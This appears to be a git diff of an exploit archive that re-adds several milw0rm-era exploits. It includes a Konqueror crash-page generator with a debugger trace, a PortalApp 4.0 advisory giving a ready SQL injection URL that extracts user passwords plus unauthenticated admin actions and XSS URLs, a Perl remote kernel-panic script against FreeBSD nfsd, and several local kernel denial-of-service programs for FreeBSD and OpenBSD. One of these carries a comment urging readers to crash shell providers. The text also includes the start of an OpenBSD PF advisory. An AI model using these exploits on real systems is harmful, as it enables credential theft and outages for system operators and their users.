?? () from /usr/lib/libkhtml.so.4 -#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4 -#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4 -#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4 -#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4 -#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4 -#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4 -#30 0xb603d5ae in ?? 
() from /usr/lib/libkhtml.so.4 -#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4 -#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4 -#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4 -#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4 -#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4 -#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4 -#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4 -#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 -#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 -#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4 -#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4 -#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#45 0xb7278051 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 -#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3 -#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3 -#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3 -#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3 -#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4 -#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3 -#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers () -from /usr/lib/libqt-mt.so.3 -#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3 -#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3 -#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3 -#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3 -#57 0xb666390a in kdemain () from 
/usr/lib/libkdeinit_konqueror.so -#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so -#59 0x0804ee20 in ?? () -#60 0x0804f541 in ?? () -#61 0x0804fa7b in ?? () -#62 0x0805057d in ?? () -#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6 -#64 0x0804bb91 in ?? () - -Looks like it might have something to do with libx11... - -konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed. - -Program received signal SIGABRT, Aborted. -[Switching to Thread 0xb660f6c0 (LWP 10553)] -0xb7eef410 in __kernel_vsyscall () -(gdb) i r -eax 0x0 0 -ecx 0x2939 10553 -edx 0x6 6 -ebx 0x2939 10553 -esp 0xbf855efc 0xbf855efc -ebp 0xbf855f18 0xbf855f18 -esi 0x2939 10553 -edi 0xb7cd8ff4 -1211265036 -eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16> -eflags 0x206 [ PF IF ] -cs 0x73 115 -ss 0x7b 123 -ds 0x7b 123 -es 0x7b 123 -fs 0x0 0 -gs 0x33 51 -(gdb) - -Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. - -# milw0rm.com [2008-10-06] +Konqueror isn't immune from fuzzing either +Konqueror, KDE's mighty mascot browser.. fuzzed. + +perl -e 'print "\n" . ""' > kdie.html + +#6 0xb7f8d410 in __kernel_vsyscall () +#7 0xb7cf2085 in raise () from /lib/tls/i686/cmov/libc.so.6 +#8 0xb7cf3a01 in abort () from /lib/tls/i686/cmov/libc.so.6 +#9 0xb7ceb10e in __assert_fail () from /lib/tls/i686/cmov/libc.so.6 +#10 0xb6e94d10 in ?? () from /usr/lib/libX11.so.6 +#11 0xb6e9518a in _XPutXCBBuffer () from /usr/lib/libX11.so.6 +#12 0xb6e965df in _XSend () from /usr/lib/libX11.so.6 +#13 0xb6e7c758 in XLookupColor () from /usr/lib/libX11.so.6 +#14 0xb71a61d1 in QColor::setSystemNamedColor () from /usr/lib/libqt-mt.so.3 +#15 0xb721c446 in QColor::setNamedColor () from /usr/lib/libqt-mt.so.3 +#16 0xb60c5250 in ?? 
() from /usr/lib/libkhtml.so.4 +#17 0xb60d143b in DOM::CSSParser::parseColorFromValue () +from /usr/lib/libkhtml.so.4 +#18 0xb60d216d in DOM::CSSParser::parseColor () from /usr/lib/libkhtml.so.4 +#19 0xb60d3c9f in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 +#20 0xb60d7a09 in ?? () from /usr/lib/libkhtml.so.4 +#21 0xb60d8134 in DOM::CSSParser::runParser () from /usr/lib/libkhtml.so.4 +#22 0xb60d85a2 in DOM::CSSParser::parseValue () from /usr/lib/libkhtml.so.4 +#23 0xb60d86e1 in ?? () from /usr/lib/libkhtml.so.4 +#24 0xb601f0e9 in ?? () from /usr/lib/libkhtml.so.4 +#25 0xb6021711 in ?? () from /usr/lib/libkhtml.so.4 +#26 0xb6002b8a in ?? () from /usr/lib/libkhtml.so.4 +#27 0xb602da00 in ?? () from /usr/lib/libkhtml.so.4 +#28 0xb602dc96 in ?? () from /usr/lib/libkhtml.so.4 +#29 0xb603b11f in ?? () from /usr/lib/libkhtml.so.4 +#30 0xb603d5ae in ?? () from /usr/lib/libkhtml.so.4 +#31 0xb5fb064e in KHTMLPart::write () from /usr/lib/libkhtml.so.4 +#32 0xb5fa50c4 in KHTMLPart::slotData () from /usr/lib/libkhtml.so.4 +#33 0xb5fd527f in KHTMLPart::qt_invoke () from /usr/lib/libkhtml.so.4 +#34 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#35 0xb7ab2dcd in KIO::TransferJob::data () from /usr/lib/libkio.so.4 +#36 0xb7ab2e38 in KIO::TransferJob::slotData () from /usr/lib/libkio.so.4 +#37 0xb7afa659 in KIO::TransferJob::qt_invoke () from /usr/lib/libkio.so.4 +#38 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#39 0xb7ab11ae in KIO::SlaveInterface::data () from /usr/lib/libkio.so.4 +#40 0xb7af9e89 in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 +#41 0xb7b1be4a in KIO::SlaveInterface::dispatch () from /usr/lib/libkio.so.4 +#42 0xb7ac2d7c in KIO::Slave::gotInput () from /usr/lib/libkio.so.4 +#43 0xb7af1278 in KIO::Slave::qt_invoke () from /usr/lib/libkio.so.4 +#44 0xb7277704 in QObject::activate_signal () from /usr/lib/libqt-mt.so.3 +#45 0xb7278051 in QObject::activate_signal () from 
/usr/lib/libqt-mt.so.3 +#46 0xb7607b99 in QSocketNotifier::activated () from /usr/lib/libqt-mt.so.3 +#47 0xb7299766 in QSocketNotifier::event () from /usr/lib/libqt-mt.so.3 +#48 0xb720bc36 in QApplication::internalNotify () from /usr/lib/libqt-mt.so.3 +#49 0xb720da5f in QApplication::notify () from /usr/lib/libqt-mt.so.3 +#50 0xb7911672 in KApplication::notify () from /usr/lib/libkdecore.so.4 +#51 0xb719c28d in QApplication::sendEvent () from /usr/lib/libqt-mt.so.3 +#52 0xb71fdb4a in QEventLoop::activateSocketNotifiers () +from /usr/lib/libqt-mt.so.3 +#53 0xb71b1630 in QEventLoop::processEvents () from /usr/lib/libqt-mt.so.3 +#54 0xb7226f90 in QEventLoop::enterLoop () from /usr/lib/libqt-mt.so.3 +#55 0xb7226c8e in QEventLoop::exec () from /usr/lib/libqt-mt.so.3 +#56 0xb720d7df in QApplication::exec () from /usr/lib/libqt-mt.so.3 +#57 0xb666390a in kdemain () from /usr/lib/libkdeinit_konqueror.so +#58 0xb6748454 in kdeinitmain () from /usr/lib/kde3/konqueror.so +#59 0x0804ee20 in ?? () +#60 0x0804f541 in ?? () +#61 0x0804fa7b in ?? () +#62 0x0805057d in ?? () +#63 0xb7cdd450 in __libc_start_main () from /lib/tls/i686/cmov/libc.so.6 +#64 0x0804bb91 in ?? () + +Looks like it might have something to do with libx11... + +konqueror: ../../src/xcb_lock.c:89: request_length: Assertion `vec[0].iov_len >= 4' failed. + +Program received signal SIGABRT, Aborted. +[Switching to Thread 0xb660f6c0 (LWP 10553)] +0xb7eef410 in __kernel_vsyscall () +(gdb) i r +eax 0x0 0 +ecx 0x2939 10553 +edx 0x6 6 +ebx 0x2939 10553 +esp 0xbf855efc 0xbf855efc +ebp 0xbf855f18 0xbf855f18 +esi 0x2939 10553 +edi 0xb7cd8ff4 -1211265036 +eip 0xb7eef410 0xb7eef410 <__kernel_vsyscall+16> +eflags 0x206 [ PF IF ] +cs 0x73 115 +ss 0x7b 123 +ds 0x7b 123 +es 0x7b 123 +fs 0x0 0 +gs 0x33 51 +(gdb) + +Tested on Ubuntu 8.04 + Konqueror 3.5.9 , fully patched. Peace. + +# milw0rm.com [2008-10-06] diff --git a/platforms/linux/dos/6704.txt b/platforms/linux/dos/6704.txt index 7c2a880fa..56afed24a 100755 
--- a/platforms/linux/dos/6704.txt +++ b/platforms/linux/dos/6704.txt @@ -1,12 +1,12 @@ -KDE's Konqueror & Color Attribute Love - -perl -e 'print "\n" . "\n"' > kdie.html -perl -e 'print "\n" . "


\n"' > kdie2.html -perl -e 'print "\n" . "

Upload File


- Icon:
- Show Signature:
- Notify:
- Locked:
- Sticky:
- Date:
- DateLast:
- - - - -delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID] -delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID] -delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID] -delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID] - -#There some other actions: -insert_level3_edit_disc_replies -insert_detail_disc_topics -update_level1_edit_disc_forums -update_level2_edit_disc_topics -update_level3_edit_disc_replies -update_detail_disc_topics -update_level2_disc_replies - - -############################################################################## -#Following actions in 'Content.asp' can take done without any authentication.# -############################################################################## -Add content: - -
- userid:by default 255 is sa
- ContentTypeID:1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...
- catID:
- Date:
- Author:
- title:
- ShortDesc:

- LongDesc:

- relatedULR
- DownloadURL:
- Filename:
- Thumbnail:
- Image1:
- PrevContentID:
- NextContentID:
- views:
- AVGRating:
- -
- - -'insert_detail_content' is also vulnerable. Use above html code for exploit - - -############################################################################## -# XSS # -############################################################################## -http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 -http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 - -# milw0rm.com [2008-01-06] +############################################################################## +#Title: PortalApp 4.0 Multiple vulnerabilities # +# # +#Discovered By: r3dm0v3 # +# http://r3dm0v3.persianblog.ir # +# r3dm0v3( 4t }yahoo[dot}com # +# Tehran - Iran # +# # +#Vendor: http://www.portalapp.com # +#Vulnerable Version: 4.0, prior versions maybe vulnerable # +#Remote Exploit: Yes # +#Dork: "Copyright @2007 Iatek LLC" # +#Fix: Not Available # +############################################################################## + +############################################################################## +# SQL Injection (CRITICAL) # +############################################################################## +#Description: +PortalApp is a Content Management System (CMS) for websites. +Bug: The user input 'sortby' is directly used in query statement! + +#Exploit: +http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users + +author will be usernames +topic will be passwords +replies will be username IDs +views will be access levels (5 is super admin) + + +############################################################################## +# Following actions in 'forum.asp' can take done without any authentication. # +############################################################################## +create a forum: + +
+ userid:by default 255 is sa
+ ForumName:
+ Description:
+ ForumSection:
+ DisplayOrder:
+ +
+ + +create a topic: + +
+ userid:by default 255 is sa
+ ForumID:
+ Subject:
+ Message:
diff --git a/platforms/bsd/dos/1540.pl b/platforms/bsd/dos/1540.pl index b7e0d665a..370b6c226 100755 --- a/platforms/bsd/dos/1540.pl +++ b/platforms/bsd/dos/1540.pl 
@@ -1,31 +1,31 @@
-#!/usr/bin/perl
-## Saw an advisory on Dailydave and wrote a little script to
-## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
-##
-## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
-## Evgeny Legerov
-## www.gleg.net
-
-use IO::Socket;
-
-sub usage
-{
- print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n";
- print "Advisory from Evgeny Legerov (www.gleg.net)\n";
- print "Code by str0ke (milw0rm.com)\n";
- print "Usage: $0 www.example.com\n";
- exit ();
-}
-
-my $host = shift || &usage;
-
-my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" .
- "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" .
- "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" .
- "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" .
- "\x2f\x74\x6d\x70";
-
-$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n";
-print $socket $printer . "\n";
-
-# milw0rm.com [2006-02-28]
+#!/usr/bin/perl
+## Saw an advisory on Dailydave and wrote a little script to
+## check my freebsd boxes (kind of evil). /str0ke (milw0rm.com)
+##
+## ProtoVer NFS testsuite 1.0 uncovered remote kernel panic vulnerability in FreeBSD 6.0 kernel.
+## Evgeny Legerov
+## www.gleg.net
+
+use IO::Socket;
+
+sub usage
+{
+ print "FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit\n";
+ print "Advisory from Evgeny Legerov (www.gleg.net)\n";
+ print "Code by str0ke (milw0rm.com)\n";
+ print "Usage: $0 www.example.com\n";
+ exit ();
+}
+
+my $host = shift || &usage;
+
+my $printer = "\x80\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00" .
+ "\x00\x00\x00\x02\x00\x01\x86\xa5\x00\x00\x00\x01" .
+ "\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00" .
+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04" .
+ "\x2f\x74\x6d\x70";
+
+$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => "2049") || die "\n+ Connection failed...\n";
+print $socket $printer . "\n";
+
+# milw0rm.com [2006-02-28]
diff --git a/platforms/bsd/dos/2524.c b/platforms/bsd/dos/2524.c
index 8037a10dc..81374e845 100755
--- a/platforms/bsd/dos/2524.c
+++ b/platforms/bsd/dos/2524.c
@@ -1,14 +1,14 @@
-#include
-#include
-#include
-/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
-thank you oh unknown, sincerely kokanin@gmail. usage: ./blah */
-
-int main(int argc, char *argv[]){
- struct ptrace_lwpinfo *lol;
- ptrace(PT_ATTACH,atoi(argv[1]),NULL,0);
- wait(NULL);
- ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768);
-}
-
-// milw0rm.com [2006-10-12]
+#include
+#include
+#include
+/* lol lol, exploit for http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=419
+thank you oh unknown, sincerely kokanin@gmail. usage: ./blah */
+
+int main(int argc, char *argv[]){
+ struct ptrace_lwpinfo *lol;
+ ptrace(PT_ATTACH,atoi(argv[1]),NULL,0);
+ wait(NULL);
+ ptrace(PT_LWPINFO,atoi(argv[1]),(void *)&lol,32768);
+}
+
+// milw0rm.com [2006-10-12]
diff --git a/platforms/bsd/dos/2541.c b/platforms/bsd/dos/2541.c
index 70aaf1619..c43994054 100755
--- a/platforms/bsd/dos/2541.c
+++ b/platforms/bsd/dos/2541.c
@@ -1,27 +1,27 @@
-/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC
- Log: According to POSIX, the result of ftruncate(2) is unspecified
- for file types other than VREG, VDIR and shared memory objects.
- We already handle VREG, VLNK and VDIR cases. Silently ignore
- truncate requests for all the rest. PR kern/98064
-
- lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
- tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing)
- - it just makes the system reboot, and with a bit of luck fucks up the filesystem.
- wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
- usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
-
-*/
-
-#include
-#include
-#include
-#include
-
-int main(){
-mkfifo("lol",0x1b6);
-int fd = open("lol",O_RDWR);
-ftruncate(fd,12345);
-close(fd);
-}
-
-// milw0rm.com [2006-10-13]
+/* FreeBSD cvs commit: src/sys/ufs/ufs/ufs_vnops.c maxim 2006-05-31 13:15:29 UTC
+ Log: According to POSIX, the result of ftruncate(2) is unspecified
+ for file types other than VREG, VDIR and shared memory objects.
+ We already handle VREG, VLNK and VDIR cases. Silently ignore
+ truncate requests for all the rest. PR kern/98064
+
+ lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
+ tested on FreeBSD 6.0-RELEASE-p5, 6.1-RELEASE-p10 (latest at the time of writing)
+ - it just makes the system reboot, and with a bit of luck fucks up the filesystem.
+ wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
+ usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
+
+*/
+
+#include
+#include
+#include
+#include
+
+int main(){
+mkfifo("lol",0x1b6);
+int fd = open("lol",O_RDWR);
+ftruncate(fd,12345);
+close(fd);
+}
+
+// milw0rm.com [2006-10-13]
diff --git a/platforms/bsd/dos/2542.c b/platforms/bsd/dos/2542.c
index 2608a73ea..2f3ca26eb 100755
--- a/platforms/bsd/dos/2542.c
+++ b/platforms/bsd/dos/2542.c
@@ -1,16 +1,16 @@
-/* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21 00:40:38 UTC
- Log: Don't allow non-root user to set a scheduler policy, otherwise this could be a local DOS.
- lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
- tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE, 6.1-RELEASE-p10 (latest at the time of writing)
- wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
- usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
-*/
-#include
-int main(){
-struct sched_param lol;
-lol.sched_priority = sched_get_priority_max(SCHED_FIFO);
-sched_setscheduler(0,SCHED_FIFO,&lol);
-for(;;){}
-}
-
-// milw0rm.com [2006-10-13]
+/* FreeBSD cvs commit: src/sys/posix4/p1003_1b.c davidxu 2006-05-21 00:40:38 UTC
+ Log: Don't allow non-root user to set a scheduler policy, otherwise this could be a local DOS.
+ lol lol, thatz true. kokanin@gmail lolling it out in '06 !"#%&%(20061013)(="#"!
+ tested on FreeBSD 5.5-RELEASE, 6.0-RELEASE-p5, 6.1-RELEASE, 6.1-RELEASE-p10 (latest at the time of writing)
+ wow, that sort of makes this 0day local freebsd denial of service for non-CURRENT or whatever.
+ usage: ./run me and wait a moment.. woo, it's friday the 13th, go crash some shell providers.
+*/
+#include
+int main(){
+struct sched_param lol;
+lol.sched_priority = sched_get_priority_max(SCHED_FIFO);
+sched_setscheduler(0,SCHED_FIFO,&lol);
+for(;;){}
+}
+
+// milw0rm.com [2006-10-13]
diff --git a/platforms/bsd/dos/2639.c b/platforms/bsd/dos/2639.c
index 59eda541f..bb845bc4b 100755
--- a/platforms/bsd/dos/2639.c
+++ b/platforms/bsd/dos/2639.c
@@ -1,39 +1,39 @@
-// Evgeny Legerov (elegerov.blogspot.com)
-
-#include unistd.h
-#include sys/types.h
-#include stdio.h
-#include fcntl.h
-#include crypto/cryptodev.h
-
-int main()
-{
- int fd2, fd;
- struct crypt_kop kop;
-
- printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n");
-
- fd2 = open("/dev/crypto", O_RDWR, 0);
- if (fd2 == -1){
- perror("open");
- exit(-1);
- }
-
- if (ioctl(fd2, CRIOGET, &fd) == -1) {
- perror("ioctl");
- exit(-1);
- }
-
- kop.crk_op = CRK_MOD_EXP;
- kop.crk_iparams = 3;
- kop.crk_oparams = 1;
- kop.crk_param[0].crp_nbits = 0x70000000;
-
- ioctl(fd, CIOCKEY, &kop);
-
- printf("exploit failed\n");
-
- return 0;
-}
-
-// milw0rm.com [2006-10-24]
+// Evgeny Legerov (elegerov.blogspot.com)
+
+#include unistd.h
+#include sys/types.h
+#include stdio.h
+#include fcntl.h
+#include crypto/cryptodev.h
+
+int main()
+{
+ int fd2, fd;
+ struct crypt_kop kop;
+
+ printf("FreeBSD 6.1 /dev/crypto local kernel DoS\n");
+
+ fd2 = open("/dev/crypto", O_RDWR, 0);
+ if (fd2 == -1){
+ perror("open");
+ exit(-1);
+ }
+
+ if (ioctl(fd2, CRIOGET, &fd) == -1) {
+ perror("ioctl");
+ exit(-1);
+ }
+
+ kop.crk_op = CRK_MOD_EXP;
+ kop.crk_iparams = 3;
+ kop.crk_oparams = 1;
+ kop.crk_param[0].crp_nbits = 0x70000000;
+
+ ioctl(fd, CIOCKEY, &kop);
+
+ printf("exploit failed\n");
+
+ return 0;
+}
+
+// milw0rm.com [2006-10-24]
diff --git a/platforms/bsd/dos/343.c b/platforms/bsd/dos/343.c
index 89a2e12db..e7eeac11a 100755
--- a/platforms/bsd/dos/343.c
+++ b/platforms/bsd/dos/343.c
@@ -325,6 +325,6 @@ in_cksum(u_short *addr, int len) sum += (sum >> 16); answer = ~sum; return(answer);
-}
-
-// milw0rm.com [2002-09-17]
+}
+
+// milw0rm.com [2002-09-17]
diff --git a/platforms/bsd/dos/4935.c b/platforms/bsd/dos/4935.c
index 174dd5efe..9fdbc99a9 100755
--- a/platforms/bsd/dos/4935.c
+++ b/platforms/bsd/dos/4935.c
@@ -1,64 +1,64 @@
-/*
- * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl]
- * Null Pointer Dereference local Denial of Service Exploit
- *
- * by Hunger
- *
- * Advisory:
- * http://marc.info/?l=openbsd-security-announce&m=120007327504064
- *
- * FOR TESTING PURPOSES ONLY!
- *
- * $ uname -mrsv
- * OpenBSD 4.2 GENERIC#375 i386
- * $ id
- * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
- * $ ftp -V http://hunger.hu/rtlabdos.c
- * 100% |******************************************| 1814 00:00
- * $ gcc rtlabdos.c -o rtlabdos
- * $ ./rtlabdos
- * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e
- * kernel: page fault trap, code=0
- * Stopped at strlcpy+0x1c: movb 0(%edx),%al
- * ddb> trace
- * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c
- * ifioctl(d6033280,c0206983,d826fe78,d616696c,d61772a0) at ifioctl+0xa0d
- * sys_ioctl(d616696c,d826ff68,d826ff58,1c000680,73) at sys_ioctl+0x125
- * syscall() at syscall+0x24a
- * --- syscall (number 54) ---
- * 0xf557d1:
- * ddb> show registers
- * ds 0x10
- * es 0x10
- * fs 0x58
- * gs 0x10
- * edi 0
- * esi 0x20
- * ebp 0xd826fd60 end+0x7a33a90
- * ebx 0xd826fd98 end+0x7a33ac8
- * edx 0
- * ecx 0x1f
- * eax 0
- * eip 0xd064acb0 strlcpy+0x1c
- * cs 0x8
- * eflags 0x10212
- * esp 0xd826fd54 end+0x7a33a84
- * ss 0xd8260010 end+0x7a23d40
- * strlcpy+0x1c: movb 0(%edx),%al
- *
- */
-
-#include
-#include
-#include
-#include
-
-int
-main(void)
-{
-struct ifreq ifr = { .ifr_name = "lo0" };
-
-return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr);
-}
-
-// milw0rm.com [2008-01-18]
+/*
+ * OpenBSD 4.2 rtlabel_id2name() [SIOCGIFRTLABEL ioctl]
+ * Null Pointer Dereference local Denial of Service Exploit
+ *
+ * by Hunger
+ *
+ * Advisory:
+ * http://marc.info/?l=openbsd-security-announce&m=120007327504064
+ *
+ * FOR TESTING PURPOSES ONLY!
+ *
+ * $ uname -mrsv
+ * OpenBSD 4.2 GENERIC#375 i386
+ * $ id
+ * uid=1000(hunger) gid=1000(hunger) groups=1000(hunger)
+ * $ ftp -V http://hunger.hu/rtlabdos.c
+ * 100% |******************************************| 1814 00:00
+ * $ gcc rtlabdos.c -o rtlabdos
+ * $ ./rtlabdos
+ * uvm_fault(0xd617865e0, 0x0, 0, 1) -> e
+ * kernel: page fault trap, code=0
+ * Stopped at strlcpy+0x1c: movb 0(%edx),%al
+ * ddb> trace
+ * strlcpy(d826fd98,0,20,6,d61772a0) at strlcpy+0x1c
+ * ifioctl(d6033280,c0206983,d826fe78,d616696c,d61772a0) at ifioctl+0xa0d
+ * sys_ioctl(d616696c,d826ff68,d826ff58,1c000680,73) at sys_ioctl+0x125
+ * syscall() at syscall+0x24a
+ * --- syscall (number 54) ---
+ * 0xf557d1:
+ * ddb> show registers
+ * ds 0x10
+ * es 0x10
+ * fs 0x58
+ * gs 0x10
+ * edi 0
+ * esi 0x20
+ * ebp 0xd826fd60 end+0x7a33a90
+ * ebx 0xd826fd98 end+0x7a33ac8
+ * edx 0
+ * ecx 0x1f
+ * eax 0
+ * eip 0xd064acb0 strlcpy+0x1c
+ * cs 0x8
+ * eflags 0x10212
+ * esp 0xd826fd54 end+0x7a33a84
+ * ss 0xd8260010 end+0x7a23d40
+ * strlcpy+0x1c: movb 0(%edx),%al
+ *
+ */
+
+#include
+#include
+#include
+#include
+
+int
+main(void)
+{
+struct ifreq ifr = { .ifr_name = "lo0" };
+
+return ioctl(socket(AF_INET, SOCK_DGRAM, 0), SIOCGIFRTLABEL, &ifr);
+}
+
+// milw0rm.com [2008-01-18]
diff --git a/platforms/bsd/dos/8581.txt b/platforms/bsd/dos/8581.txt
index 4078af6e7..61d1f4040 100755
--- a/platforms/bsd/dos/8581.txt
+++ b/platforms/bsd/dos/8581.txt
@@ -1,142 +1,142 @@ - _ _ _____ _ ___ _____ _ _ - / / / / ____/ / / _/_ __/ / / / - / /_/ / __/ / / / / / / / /_/ / - / __ / /___/ /____/ / / / / __ / - /_/ /_/_____/_____/___/ /_/ /_/ /_/ - Helith - 0815 --------------------------------------------------------------------------------- - -Author : Rembrandt -Date : 2009-04-30 -Found : 2009-04-09 -Affected Software: PF (OpenBSD Packet Filter) -Affected OS : OpenBSD 4.2 up to 4.5 and HEAD branch up to 2009-04-11 - NetBSD 5.x up to RC3 and HEAD branch up to 2009-04-13 - MirOS #10 and earlier - MidnightBSD 0.3-current -Not affected OS : FreeBSD - NetBSD 3.x, 4.x, 5.x (patched before release) - DragonflyBSD - Debian GNU/kFreeBSD - MidnightBSD prior 0.3 - - Older versions of OpenBSD PF and products based - thereon might be affected as well. - The Bug was introduced between the OpenBSD 4.1 and 4.2 - release. - -Type : Denial of Service - -OSVDB : 53608 -Milw0rm : 8406 -CVE : -ISS X-Force: : -BID : 34482 -Secunia : 34676 -VUPEN ID : ADV-2009-1015 - -This advisory supercedes the original advisory which was just related to -OpenBSD because we had to publish an announcement in response to OpenBSD's -reaction. - -Trying to fix it responsibly and get in contact with the vendor: - --- OpenBSD -- -Contacted 2009-04-09 16:35 UTC -Patch available 2009-04-11 23:43 UTC - -We received no response nor a notification about an upcoming patch. -Also we had no chance to coordinate or inform other projects before OpenBSD -issued the patch and a statement. - -We like to mention that the issued patch is just a workaround and does not -patch or remove the affected code. - --- NetBSD -- -Contacted and asked for confirmation 2009-04-15 06:00 UTC -Were informed about further investigations 2009-04-15 9:42 UTC -Received information about upcoming Patches 2009-04-15 11:57 UTC -Received confirmation for 5.x up to RC3 and HEAD 2009-04-15 12:17 UTC - -We thank the NetBSD team that they patched the PF bug prior the 5.x release! 
- --- FreeBSD -- -Contacted and asked for confirmation 2009-04-15 06:56 UTC -Were informed about further investigations 2009-04-15 7:56 UTC -Were informed about not being vulnerable 2009-04-15 22:05 UTC - --- DragonflyBSD -- -Contacted and asked for confirmation 2009-04-15 06:10 UTC -Were informed about not being vulnerable 2009-04-15 21:35 UTC - --- MirOS (MirBSD) -- -Contacted and asked for official confirmation 2009-04-15 06:36 UTC -Received confirmation for MirBSD 10 and prior 2009-04-15 17:57 UTC - --- MidnightBSD -- -Contacted and asked for official confirmation 2009-04-15 20:17 UTC -Received confirmation for MidnightBSD 2009-04-15 22:37 UTC - --- Debian GNU/kFreeBSD -- -Contacted and asked for official confirmation 2009-04-15 22:41 UTC -Were informed about not being vulnerable 2009-04-15 23:35 UTC --- END -- - - -OpenBSDs PF firewall is prone to a remote Denial of Service due to a NULL- -pointer dereference when handling special crafted IP datagrams. If the -firewall handles such a packet the kernel panics. -An example for such a packet 